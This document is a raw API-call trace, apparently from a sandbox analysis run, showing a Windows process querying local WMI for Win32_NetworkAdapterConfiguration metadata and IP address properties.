	[0127.572] IUnknown:QueryInterface (in: This=0x2ad3bb12440, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c2e8 | out: ppvObject=0xd7ef71c2e8*=0x0) returned 0x80004002
	[0127.572] IUnknown:Release (This=0x2ad3bb12440) returned 0x3
	[0127.572] IUnknown:Release (This=0x2ad3bb12440) returned 0x2
	[0127.573] WbemDefPath:IUnknown:Release (This=0x2ad3bb1f0c0) returned 0x0
	[0127.573] IUnknown:Release (This=0x2ad3bb12440) returned 0x1
	[0127.573] IWbemClassObject:Get (in: This=0x2ad206a7850, wszName="__NAMESPACE", lFlags=0, pVal=0xd7ef71cdd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71cdcc*=0, plFlavor=0xd7ef71cdc8*=0 | out: pVal=0xd7ef71cdd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0xd7ef71cdcc*=8, plFlavor=0xd7ef71cdc8*=64) returned 0x0
	[0127.573] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0127.573] IWbemClassObject:Get (in: This=0x2ad206a7850, wszName="__NAMESPACE", lFlags=0, pVal=0xd7ef71cde0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71cddc*=8, plFlavor=0xd7ef71cdd8*=64 | out: pVal=0xd7ef71cde0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0xd7ef71cddc*=8, plFlavor=0xd7ef71cdd8*=64) returned 0x0
	[0127.573] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0127.574] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb12980, puCount=0xd7ef71cde0 | out: puCount=0xd7ef71cde0*=0x2) returned 0x0
	[0127.574] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71cde0*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71cde0*=0x17, pszText=0x0) returned 0x0
	[0127.574] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71cde0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71cde0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.574] IWbemClassObject:Get (in: This=0x2ad206a7850, wszName="__CLASS", lFlags=0, pVal=0xd7ef71cdd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71cdcc*=0, plFlavor=0xd7ef71cdc8*=0 | out: pVal=0xd7ef71cdd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration", varVal2=0x0), pType=0xd7ef71cdcc*=8, plFlavor=0xd7ef71cdc8*=64) returned 0x0
	[0127.574] SysStringLen (param_1="Win32_NetworkAdapterConfiguration") returned 0x21
	[0127.574] IWbemClassObject:Get (in: This=0x2ad206a7850, wszName="__CLASS", lFlags=0, pVal=0xd7ef71cde0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71cddc*=8, plFlavor=0xd7ef71cdd8*=64 | out: pVal=0xd7ef71cde0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration", varVal2=0x0), pType=0xd7ef71cddc*=8, plFlavor=0xd7ef71cdd8*=64) returned 0x0
	[0127.574] SysStringLen (param_1="Win32_NetworkAdapterConfiguration") returned 0x21
	[0127.575] IWbemClassObject:GetNames (in: This=0x2ad206a7850, wszQualifierName=0x0, lFlags=48, pQualifierVal=0xd7ef71c868*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0xd7ef71c860 | out: pNames=0xd7ef71c860*="\x01ƀ\x08") returned 0x0
	[0127.575] SafeArrayGetDim (psa=0x2ad3bb03b90) returned 0x1
	[0127.575] IWbemClassObject:Get (in: This=0x2ad206a7850, wszName="__GENUS", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0xd7ef71c85c*=3, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.575] IWbemClassObject:Get (in: This=0x2ad206a7850, wszName="__CLASS", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration", varVal2=0x0), pType=0xd7ef71c85c*=8, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.575] SysStringLen (param_1="Win32_NetworkAdapterConfiguration") returned 0x21
	[0127.576] IWbemClassObject:Get (in: This=0x2ad206a7850, wszName="__SUPERCLASS", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_Setting", varVal2=0x0), pType=0xd7ef71c85c*=8, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.576] SysStringLen (param_1="CIM_Setting") returned 0xb
	[0127.576] IWbemClassObject:Get (in: This=0x2ad206a7850, wszName="__DYNASTY", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_Setting", varVal2=0x0), pType=0xd7ef71c85c*=8, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.576] SysStringLen (param_1="CIM_Setting") returned 0xb
	[0127.576] IWbemClassObject:Get (in: This=0x2ad206a7850, wszName="__RELPATH", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration.Index=3", varVal2=0x0), pType=0xd7ef71c85c*=8, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.576] SysStringLen (param_1="Win32_NetworkAdapterConfiguration.Index=3") returned 0x29
	[0127.577] IWbemClassObject:Get (in: This=0x2ad206a7850, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3d, varVal2=0x0), pType=0xd7ef71c85c*=3, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.577] IWbemClassObject:Get (in: This=0x2ad206a7850, wszName="__DERIVATION", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad3bb04410*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x2ad3bac2b80, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0xd7ef71c85c*=8200, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.577] IWbemClassObject:Get (in: This=0x2ad206a7850, wszName="__SERVER", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="X2VS1CUM", varVal2=0x0), pType=0xd7ef71c85c*=8, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.577] SysStringLen (param_1="X2VS1CUM") returned 0x8
	[0127.577] IWbemClassObject:Get (in: This=0x2ad206a7850, wszName="__NAMESPACE", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0xd7ef71c85c*=8, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.577] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0127.578] IWbemClassObject:Get (in: This=0x2ad206a7850, wszName="__PATH", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=3", varVal2=0x0), pType=0xd7ef71c85c*=8, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.578] SysStringLen (param_1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=3") returned 0x3f
	[0127.578] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb12980, puCount=0xd7ef71c900 | out: puCount=0xd7ef71c900*=0x2) returned 0x0
	[0127.578] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71c900*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71c900*=0x17, pszText=0x0) returned 0x0
	[0127.578] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71c900*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71c900*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.578] IWbemClassObject:Get (in: This=0x2ad206a7850, wszName="IPAddREss", lFlags=0, pVal=0xd7ef71c8f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c8ec*=0, plFlavor=0xd7ef71c8e8*=0 | out: pVal=0xd7ef71c8f0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c8ec*=8200, plFlavor=0xd7ef71c8e8*=32) returned 0x0
	[0127.578] IWbemClassObject:Get (in: This=0x2ad206a7850, wszName="IPAddREss", lFlags=0, pVal=0xd7ef71cb20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71cb1c*=8200, plFlavor=0xd7ef71cb18*=32 | out: pVal=0xd7ef71cb20*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71cb1c*=8200, plFlavor=0xd7ef71cb18*=32) returned 0x0
	[0127.579] CoTaskMemAlloc (cb=0x8) returned 0x2ad3bac2e10
	[0127.579] IEnumWbemClassObject:Next (in: This=0x2ad3bae1500, lTimeout=-1, uCount=0x1, apObjects=0x2ad3bac2e10, puReturned=0xd7ef71d3f8 | out: apObjects=0x2ad3bac2e10*=0x0, puReturned=0xd7ef71d3f8*=0x0) returned 0x1
	[0127.579] CoTaskMemFree (pv=0x2ad3bac2e10) 
	[0127.580] CoGetContextToken (in: pToken=0xd7ef71d180 | out: pToken=0xd7ef71d180) returned 0x0
	[0127.580] IUnknown:Release (This=0x2ad3bb26948) returned 0x1
	[0127.580] IUnknown:Release (This=0x2ad3bae1500) returned 0x0
	[0127.591] CoGetObjectContext (in: riid=0xd7ef71d098*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd7ef71d090 | out: ppv=0xd7ef71d090*=0x2ad205dbe30) returned 0x0
	[0127.591] IComThreadingInfo:GetCurrentApartmentType (in: This=0x2ad205dbe30, pAptType=0xd7ef71d0b0 | out: pAptType=0xd7ef71d0b0*=1) returned 0x0
	[0127.591] IUnknown:QueryInterface (in: This=0x2ad205dbe30, riid=0x2ad238546d8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0xd7ef71d1b8 | out: ppvObject=0xd7ef71d1b8*=0x0) returned 0x80004002
	[0127.591] IUnknown:Release (This=0x2ad205dbe30) returned 0x2
	[0127.591] CoGetClassObject (in: rclsid=0x2ad3bb03848*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7ffbf57cd250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd7ef71c720 | out: ppv=0xd7ef71c720*=0x2ad3bb1e440) returned 0x0
	[0127.591] WbemDefPath:IUnknown:QueryInterface (in: This=0x2ad3bb1e440, riid=0x7ffbf57cd2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0xd7ef71c430 | out: ppvObject=0xd7ef71c430*=0x0) returned 0x80004002
	[0127.591] WbemDefPath:IClassFactory:CreateInstance (in: This=0x2ad3bb1e440, pUnkOuter=0x0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c418 | out: ppvObject=0xd7ef71c418*=0x2ad3bb116c0) returned 0x0
	[0127.591] IUnknown:QueryInterface (in: This=0x2ad3bb116c0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c320 | out: ppvObject=0xd7ef71c320*=0x2ad3bb116c0) returned 0x0
	[0127.592] IUnknown:QueryInterface (in: This=0x2ad3bb116c0, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0xd7ef71c3a0 | out: ppvObject=0xd7ef71c3a0*=0x0) returned 0x80004002
	[0127.592] IUnknown:AddRef (This=0x2ad3bb116c0) returned 0x3
	[0127.592] CoGetContextToken (in: pToken=0xd7ef71bff0 | out: pToken=0xd7ef71bff0) returned 0x0
	[0127.592] IUnknown:QueryInterface (in: This=0x2ad3bb116c0, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71bfb0 | out: ppvObject=0xd7ef71bfb0*=0x2ad3bb1eb20) returned 0x0
	[0127.592] IMarshal:GetUnmarshalClass (in: This=0x2ad3bb1eb20, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0xd7ef71bfe0 | out: pCid=0xd7ef71bfe0) returned 0x0
	[0127.592] IUnknown:Release (This=0x2ad3bb1eb20) returned 0x3
	[0127.592] CoGetContextToken (in: pToken=0xd7ef71bfc0 | out: pToken=0xd7ef71bfc0) returned 0x0
	[0127.592] IUnknown:AddRef (This=0x2ad3bb116c0) returned 0x4
	[0127.592] IUnknown:QueryInterface (in: This=0x2ad3bb116c0, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c0d8 | out: ppvObject=0xd7ef71c0d8*=0x0) returned 0x80004002
	[0127.592] IUnknown:Release (This=0x2ad3bb116c0) returned 0x3
	[0127.592] IUnknown:Release (This=0x2ad3bb116c0) returned 0x2
	[0127.592] WbemDefPath:IUnknown:Release (This=0x2ad3bb1e440) returned 0x0
	[0127.592] IUnknown:Release (This=0x2ad3bb116c0) returned 0x1
	[0127.592] CoGetContextToken (in: pToken=0xd7ef71ccf0 | out: pToken=0xd7ef71ccf0) returned 0x0
	[0127.592] CoGetContextToken (in: pToken=0xd7ef71cc30 | out: pToken=0xd7ef71cc30) returned 0x0
	[0127.592] IUnknown:AddRef (This=0x2ad3bb116c0) returned 0x2
	[0127.593] IUnknown:QueryInterface (in: This=0x2ad3bb116c0, riid=0xd7ef71cd70*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xd7ef71cd50 | out: ppvObject=0xd7ef71cd50*=0x2ad3bb116c0) returned 0x0
	[0127.593] IUnknown:Release (This=0x2ad3bb116c0) returned 0x2
	[0127.593] IUnknown:Release (This=0x2ad3bb116c0) returned 0x1
	[0127.593] CoGetContextToken (in: pToken=0xd7ef71ce70 | out: pToken=0xd7ef71ce70) returned 0x0
	[0127.593] CoGetContextToken (in: pToken=0xd7ef71cdb0 | out: pToken=0xd7ef71cdb0) returned 0x0
	[0127.593] IUnknown:AddRef (This=0x2ad3bb116c0) returned 0x2
	[0127.593] IUnknown:QueryInterface (in: This=0x2ad3bb116c0, riid=0xd7ef71cef0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xd7ef71ced0 | out: ppvObject=0xd7ef71ced0*=0x2ad3bb116c0) returned 0x0
	[0127.593] IUnknown:Release (This=0x2ad3bb116c0) returned 0x2
	[0127.593] IUnknown:AddRef (This=0x2ad3bb116c0) returned 0x3
	[0127.593] IWbemPath:SetText (This=0x2ad3bb116c0, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.593] IUnknown:Release (This=0x2ad3bb116c0) returned 0x2
	[0127.593] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb116c0, puCount=0xd7ef71d180 | out: puCount=0xd7ef71d180*=0x2) returned 0x0
	[0127.593] IWbemPath:GetText (in: This=0x2ad3bb116c0, lFlags=4, puBuffLength=0xd7ef71d180*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71d180*=0x17, pszText=0x0) returned 0x0
	[0127.593] IWbemPath:GetText (in: This=0x2ad3bb116c0, lFlags=4, puBuffLength=0xd7ef71d180*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71d180*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.593] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb116c0, puCount=0xd7ef71d130 | out: puCount=0xd7ef71d130*=0x2) returned 0x0
	[0127.593] IWbemPath:GetText (in: This=0x2ad3bb116c0, lFlags=4, puBuffLength=0xd7ef71d130*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71d130*=0x17, pszText=0x0) returned 0x0
	[0127.593] IWbemPath:GetText (in: This=0x2ad3bb116c0, lFlags=4, puBuffLength=0xd7ef71d130*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71d130*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.593] CoGetObjectContext (in: riid=0xd7ef71d068*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd7ef71d060 | out: ppv=0xd7ef71d060*=0x2ad205dbe30) returned 0x0
	[0127.594] IComThreadingInfo:GetCurrentApartmentType (in: This=0x2ad205dbe30, pAptType=0xd7ef71d080 | out: pAptType=0xd7ef71d080*=1) returned 0x0
	[0127.594] IUnknown:QueryInterface (in: This=0x2ad205dbe30, riid=0x2ad238546d8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0xd7ef71d188 | out: ppvObject=0xd7ef71d188*=0x0) returned 0x80004002
	[0127.594] IUnknown:Release (This=0x2ad205dbe30) returned 0x2
	[0127.594] CoGetClassObject (in: rclsid=0x2ad3bb03f08*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7ffbf57cd250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd7ef71cd10 | out: ppv=0xd7ef71cd10*=0x2ad3bb1f3e0) returned 0x0
	[0127.594] WbemLocator:IUnknown:QueryInterface (in: This=0x2ad3bb1f3e0, riid=0x7ffbf57cd2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0xd7ef71ca20 | out: ppvObject=0xd7ef71ca20*=0x0) returned 0x80004002
	[0127.594] WbemLocator:IClassFactory:CreateInstance (in: This=0x2ad3bb1f3e0, pUnkOuter=0x0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71ca08 | out: ppvObject=0xd7ef71ca08*=0x2ad3bb1f4c0) returned 0x0
	[0127.594] WbemLocator:IUnknown:QueryInterface (in: This=0x2ad3bb1f4c0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c910 | out: ppvObject=0xd7ef71c910*=0x2ad3bb1f4c0) returned 0x0
	[0127.594] WbemLocator:IUnknown:QueryInterface (in: This=0x2ad3bb1f4c0, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0xd7ef71c990 | out: ppvObject=0xd7ef71c990*=0x0) returned 0x80004002
	[0127.594] WbemLocator:IUnknown:AddRef (This=0x2ad3bb1f4c0) returned 0x3
	[0127.594] CoGetContextToken (in: pToken=0xd7ef71c5e0 | out: pToken=0xd7ef71c5e0) returned 0x0
	[0127.594] WbemLocator:IUnknown:QueryInterface (in: This=0x2ad3bb1f4c0, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c5a0 | out: ppvObject=0xd7ef71c5a0*=0x0) returned 0x80004002
	[0127.595] CoGetContextToken (in: pToken=0xd7ef71c5b0 | out: pToken=0xd7ef71c5b0) returned 0x0
	[0127.595] WbemLocator:IUnknown:AddRef (This=0x2ad3bb1f4c0) returned 0x4
	[0127.595] WbemLocator:IUnknown:QueryInterface (in: This=0x2ad3bb1f4c0, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c6c8 | out: ppvObject=0xd7ef71c6c8*=0x0) returned 0x80004002
	[0127.595] WbemLocator:IUnknown:Release (This=0x2ad3bb1f4c0) returned 0x3
	[0127.595] WbemLocator:IUnknown:Release (This=0x2ad3bb1f4c0) returned 0x2
	[0127.595] WbemLocator:IUnknown:Release (This=0x2ad3bb1f3e0) returned 0x0
	[0127.595] WbemLocator:IUnknown:Release (This=0x2ad3bb1f4c0) returned 0x1
	[0127.595] CoGetContextToken (in: pToken=0xd7ef71cbd0 | out: pToken=0xd7ef71cbd0) returned 0x0
	[0127.595] CoGetContextToken (in: pToken=0xd7ef71cb10 | out: pToken=0xd7ef71cb10) returned 0x0
	[0127.595] WbemLocator:IUnknown:AddRef (This=0x2ad3bb1f4c0) returned 0x2
	[0127.595] WbemLocator:IUnknown:QueryInterface (in: This=0x2ad3bb1f4c0, riid=0xd7ef71cc50*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0xd7ef71cc30 | out: ppvObject=0xd7ef71cc30*=0x2ad3bb1f4c0) returned 0x0
	[0127.595] WbemLocator:IUnknown:Release (This=0x2ad3bb1f4c0) returned 0x2
	[0127.595] WbemLocator:IUnknown:Release (This=0x2ad3bb1f4c0) returned 0x1
	[0127.595] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb116c0, puCount=0xd7ef71d030 | out: puCount=0xd7ef71d030*=0x2) returned 0x0
	[0127.595] IWbemPath:GetText (in: This=0x2ad3bb116c0, lFlags=8, puBuffLength=0xd7ef71d030*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71d030*=0x17, pszText=0x0) returned 0x0
	[0127.595] IWbemPath:GetText (in: This=0x2ad3bb116c0, lFlags=8, puBuffLength=0xd7ef71d030*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71d030*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.595] CoCreateInstance (in: rclsid=0x7ffbf68f15a8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ffbf68f14d8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xd7ef71cca0 | out: ppv=0xd7ef71cca0*=0x2ad3bb1f7e0) returned 0x0
	[0127.596] WbemLocator:IWbemLocator:ConnectServer (in: This=0x2ad3bb1f7e0, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0xd7ef71cf30 | out: ppNamespace=0xd7ef71cf30*=0x2ad22c91d40) returned 0x0
	[0127.601] IUnknown:QueryInterface (in: This=0x2ad22c91d40, riid=0x7ffbf68f1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71cb18 | out: ppvObject=0xd7ef71cb18*=0x2ad3bb2b3a0) returned 0x0
